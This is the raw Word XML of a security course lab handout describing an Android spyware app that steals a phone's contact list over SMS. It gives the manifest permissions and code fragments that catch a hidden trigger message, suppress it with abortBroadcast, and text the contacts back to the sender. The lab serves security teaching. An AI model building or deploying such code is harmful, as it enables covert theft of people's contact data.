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Pr="004729E7" w:rsidRDefault="00F13438" w:rsidP="000B19A1">
      <w:pPr>
        <w:pStyle w:val="papertitle"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="009303D9" w:rsidRPr="004729E7" w:rsidSect="004C50B8">
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">SMS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
      <w:r w:rsidR="00032F14">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Steal Contact List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="44"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009303D9" w:rsidRPr="004729E7" w:rsidRDefault="009303D9" w:rsidP="00DB26FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00475489" w:rsidRPr="004729E7" w:rsidRDefault="00475489" w:rsidP="00DB26FF">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="00475489" w:rsidRPr="004729E7" w:rsidSect="004C50B8">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1080" w:right="893" w:bottom="1440" w:left="893" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:num="2" w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRPr="00F13438" w:rsidRDefault="009303D9" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00F13438" w:rsidRPr="00F13438">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>In this lab, we will use a malicious Android application we wrote to demonstrate a kind of SMS attack on Android platform. The malicious Android application which can grab a victim's contact list by sending the victim a secret short message and get the victim's contact list in a response short message secretly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRDefault="00222949" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00222949">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00F13438">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>We assume that the malicious application has been installed on a victim's Android phone carelessly. The application serves as an SMS broadcast listener which always listens to the short messages coming to the phone. As the SMS broadcast listener has a very high priority, which we set it in the AndroidManifest.xml, it will always receive the short message earlier than the Android phone SMS inbox. The application will check the SMS content to see whether it matches a hard coded pattern. If the pattern matches, it means a malicious short message request comes. Then, the application will abort the broadcast of the received short message to the inbox which means that the SMS inbox will not show the received malicious message that requests the victim's contact list. After that the application will grab the contact list and send the contact name and the phone number in one or more short messages to the attacker secretly. For ethical issue, we will not provide the entire code for this attack. We will only provide some crucial fragments instead.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13438" w:rsidRPr="00F13438" w:rsidRDefault="00F13438" w:rsidP="00F13438">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="062BC488" wp14:editId="656846A8">
            <wp:extent cx="3204845" cy="1564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4845" cy="1564005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00222949" w:rsidRDefault="00D21518" w:rsidP="00222949">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Lab Activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00E21099">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>use a "SmsBroadCastReceiver" to listen on all the received short messages.</w:t>
      </w:r>
      <w:r w:rsidR="00E21099">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> W</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e have to request permission for reading the contact list, sending and receiving</w:t>
      </w:r>
      <w:r w:rsidR="00236E58">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, read</w:t>
      </w:r>
      <w:r w:rsidR="00236E58">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ing and writing</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMS in AndroidManifest.xml as the following:</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47"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F13438" w:rsidRPr="00F26D6B" w:rsidTr="000A6ABB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00F13438" w:rsidRPr="00F13438" w:rsidRDefault="00F13438" w:rsidP="00F13438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.RECEIVE_SMS"</w:t>
            </w:r>
            <w:r w:rsidR="000B63E6" w:rsidRPr="000B63E6">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F13438" w:rsidRDefault="000B63E6" w:rsidP="00F13438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.SEND_SMS"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B63E6" w:rsidRPr="000B63E6" w:rsidRDefault="000B63E6" w:rsidP="000B63E6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B63E6">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.READ_SMS" /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000B63E6" w:rsidRPr="00F13438" w:rsidRDefault="000B63E6" w:rsidP="000B63E6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B63E6">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.WRITE_SMS" /&gt;</w:t>
            </w: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lt;uses-permission android:name="android.permission.READ_CONTACTS"</w:t>
            </w:r>
            <w:r w:rsidR="000B63E6">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F13438" w:rsidRPr="00F26D6B" w:rsidRDefault="002F6EF5" w:rsidP="000B63E6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;uses-permission android:name="android.permission.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="002F6EF5">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>READ_PHONE_STATE</w:t>
            </w:r>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="000B63E6">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00F13438">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13438">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Then we need to write code that can receive short message. The following code fragment shows how to receive SM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47"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F13438" w:rsidRPr="00F26D6B" w:rsidTr="000A6ABB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="00F13438" w:rsidRPr="00F13438" w:rsidRDefault="00F13438" w:rsidP="00F13438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>SmsMessage sms[] = new SmsMessage[object.length];</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for (int i = 0; i &lt; object.length; i++) {</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sms[i] = SmsMessage.createFromPdu((byte[]) object[i]);</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 get the received SMS content</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String receivedPattern = sms[i].getDisplayMessageBody();</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String originNum = sms[i].getDisplayOriginatingAddress();</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 if the received SMS matches the SMS_PATTERN</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 it means that this is a fetch contact list request SMS</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if (receivedPattern.equalsIgnoreCase(SMS_PATTERN)) {</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 retrieve the all the contact records</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String contactList = retrieveContactRecord(cr);</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 if the contact list is not empty</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if (!contactList.equalsIgnoreCase(""))</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 send the response SMS with the retrieved contact info</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sendReplySMS(originNum, contactList);</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 prevent the notification of the received SMS</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abortBroadcast();</w:t>
            </w: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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F13438" w:rsidRPr="00F26D6B" w:rsidRDefault="00F13438" w:rsidP="00F13438">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F13438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F13438" w:rsidRDefault="00F13438" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E4796">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>We also need to write the logic which sends the reply short message with the contact list. The following code fragment shows how we use code to send reply secret short message:</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47"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E4796" w:rsidRPr="00F26D6B" w:rsidTr="000A6ABB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4796">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>//get a SmsManager</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4796">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> SmsManager smsManager = SmsManager.getDefault(); </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4796">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> //Message may exceed 160 characters</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4796">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> //need to divide the message into multiples</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4796">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> ArrayList&lt;String&gt; parts = smsManager.divideMessage(sms);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="006E4796" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006E4796" w:rsidRPr="00F26D6B" w:rsidRDefault="006E4796" w:rsidP="006E4796">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4796">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="16"/>
                <w:lang w:val="en-IN" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> smsManager.sendMultipartTextMessage(phoneNo, null, parts, null, null);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="003B63C6" w:rsidRDefault="003B63C6" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BroadcastReceiver tutorial:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B63C6" w:rsidRDefault="009336F3" w:rsidP="00222949">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="003B63C6" w:rsidRPr="00224155">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:eastAsia="宋体"/>
            <w:szCs w:val="22"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>http://www.vogella.com/tutorials/AndroidBroadcastReceiver/article.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003B63C6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B63C6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="003B63C6">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
